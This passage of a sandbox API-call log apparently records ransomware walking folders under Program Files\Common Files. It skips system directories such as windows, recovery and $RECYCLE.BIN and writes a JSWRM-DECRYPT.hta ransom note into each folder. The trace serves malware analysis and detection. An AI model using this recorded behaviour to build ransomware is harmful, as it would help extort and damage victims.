dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0068.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0068.931] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b57d42, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="Triedit", cAlternateFileName="")) returned 1 [0068.931] lstrcmpiW (lpString1="Triedit", lpString2=".") returned 1 [0068.931] lstrcmpiW (lpString1="Triedit", lpString2="..") returned 1 [0068.931] lstrcmpiW (lpString1="Triedit", lpString2="...") returned 1 [0068.931] lstrcmpiW (lpString1="Triedit", lpString2="windows") returned -1 [0068.931] lstrcmpiW (lpString1="Triedit", lpString2="recovery") returned 1 [0068.931] lstrcmpiW (lpString1="Triedit", lpString2="perflogs") returned 1 [0068.931] lstrcmpiW (lpString1="Triedit", lpString2="documents and settings") returned 1 [0068.931] lstrcmpiW (lpString1="Triedit", lpString2="$RECYCLE.BIN") returned 1 [0068.931] lstrcmpiW (lpString1="Triedit", lpString2="system volume information") returned 1 [0068.931] lstrcmpiW (lpString1="Triedit", lpString2="msocache") returned 1 [0068.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0068.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216d80 | out: hHeap=0x1e0000) returned 1 [0068.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0068.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.931] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit\\jswrm-decrypt.hta")) returned 0xffffffff [0068.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0068.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24c1d0 [0068.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0068.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24dfa0 [0068.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0068.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.932] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0068.933] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.933] WriteFile (in: hFile=0x298, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0068.934] CloseHandle (hObject=0x298) returned 1 [0068.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24dfa0 | out: hHeap=0x1e0000) returned 1 [0068.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0068.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0068.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0068.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0068.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0068.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0068.934] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit\\jswrm-decrypt.hta")) returned 0x20 [0068.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0068.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.934] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b57d42, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fbf6ffd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName=".", cAlternateFileName="")) returned 0x231f40 [0068.934] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.934] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b57d42, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fbf6ffd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="..", cAlternateFileName="")) returned 1 [0068.934] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.934] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.934] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b58502, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="en-US", cAlternateFileName="")) returned 1 [0068.934] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0068.935] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0068.935] lstrcmpiW (lpString1="en-US", lpString2="...") returned 1 [0068.935] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0068.935] lstrcmpiW (lpString1="en-US", lpString2="recovery") returned -1 [0068.935] lstrcmpiW (lpString1="en-US", lpString2="perflogs") returned -1 [0068.935] lstrcmpiW (lpString1="en-US", lpString2="documents and settings") returned 1 [0068.935] lstrcmpiW (lpString1="en-US", lpString2="$RECYCLE.BIN") returned 1 [0068.935] lstrcmpiW (lpString1="en-US", lpString2="system volume information") returned -1 [0068.935] lstrcmpiW (lpString1="en-US", lpString2="msocache") returned -1 [0068.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0068.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0068.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.935] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit\\en-us\\jswrm-decrypt.hta")) returned 0xffffffff [0068.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0068.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0068.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.935] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit\\en-us\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.936] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.936] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.937] CloseHandle (hObject=0x454) returned 1 [0068.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0068.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.937] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit\\en-us\\jswrm-decrypt.hta")) returned 0x20 [0068.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.937] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b58502, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fbf6ffd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224ba6, cFileName=".", cAlternateFileName="")) returned 0x2321c0 [0068.937] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.937] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b58502, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fbf6ffd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224ba6, cFileName="..", cAlternateFileName="")) returned 1 [0068.937] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.937] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.937] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fbf6ffd, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fbf6ffd, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fbf6ffd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224ba6, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.937] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.938] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.938] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.938] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.938] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.938] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.938] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.938] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.938] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.938] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0068.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0068.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0068.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.938] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fbf6ffd, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fbf6ffd, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fbf6ffd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224ba6, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0068.938] FindClose (in: hFindFile=0x2321c0 | out: hFindFile=0x2321c0) returned 1 [0068.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0068.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.938] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fbf6ffd, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fbf6ffd, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fbf6ffd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.938] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.938] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.938] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.939] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.939] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.939] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.939] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.939] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.939] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.939] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0068.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0068.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0068.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0068.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.939] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fbf6ffd, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fbf6ffd, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fbf6ffd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0068.939] FindClose (in: hFindFile=0x231f40 | out: hFindFile=0x231f40) returned 1 [0068.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0068.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0068.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0068.939] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xbcd0fab8, ftCreationTime.dwHighDateTime=0x1d327b7, ftLastAccessTime.dwLowDateTime=0xa0b594b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2ce22546, ftLastWriteTime.dwHighDateTime=0x1d327be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="VC", cAlternateFileName="")) returned 1 [0068.939] lstrcmpiW (lpString1="VC", lpString2=".") returned 1 [0068.940] lstrcmpiW (lpString1="VC", lpString2="..") returned 1 [0068.940] lstrcmpiW (lpString1="VC", lpString2="...") returned 1 [0068.940] lstrcmpiW (lpString1="VC", lpString2="windows") returned -1 [0068.940] lstrcmpiW (lpString1="VC", lpString2="recovery") returned 1 [0068.940] lstrcmpiW (lpString1="VC", lpString2="perflogs") returned 1 [0068.940] lstrcmpiW (lpString1="VC", lpString2="documents and settings") returned 1 [0068.940] lstrcmpiW (lpString1="VC", lpString2="$RECYCLE.BIN") returned 1 [0068.940] lstrcmpiW (lpString1="VC", lpString2="system volume information") returned 1 [0068.940] lstrcmpiW (lpString1="VC", lpString2="msocache") returned 1 [0068.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0068.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0068.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0068.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0068.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2175c0 [0068.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0068.940] GetFileAttributesW (lpFileName="C:\\Program Files\\Common 